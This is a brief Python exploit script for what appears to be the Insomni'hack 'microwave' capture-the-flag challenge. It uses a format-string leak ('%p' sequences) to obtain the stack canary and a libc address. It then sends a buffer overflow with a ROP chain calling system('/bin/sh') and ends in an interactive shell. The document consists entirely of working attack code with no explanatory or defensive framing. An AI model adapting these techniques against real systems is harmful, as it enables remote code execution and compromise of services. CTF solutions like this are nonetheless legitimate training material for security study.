from codez import *


#r = xlocal()
r = Remote('microwave.insomni.hack',1337)
r.read(':')
r.write('1\n')
r.read(':')
r.write('%p %p %p %p %p %p %p %p!\n')
r.read(':')
dbg()
r.write('n07_7h3_fl46\n')
x=r.read('!').split(' ')
cc = int(x[-3],16)
lc = int(x[-1][:-1],16)-0x1878-0x3be000
system = lc + 0x46640
binsh = lc + 0x17ccdb
poprdi = lc + 0x022b1a
p = 'A'*0x400 + pack('Q',cc)*3 + pack('QQQ',poprdi,binsh,system)
print hex(lc),hex(system),hex(poprdi)
r.read(':')
r.write("2\n")
r.read('#>')
r.write(p)
r.read('.')
r.interactive()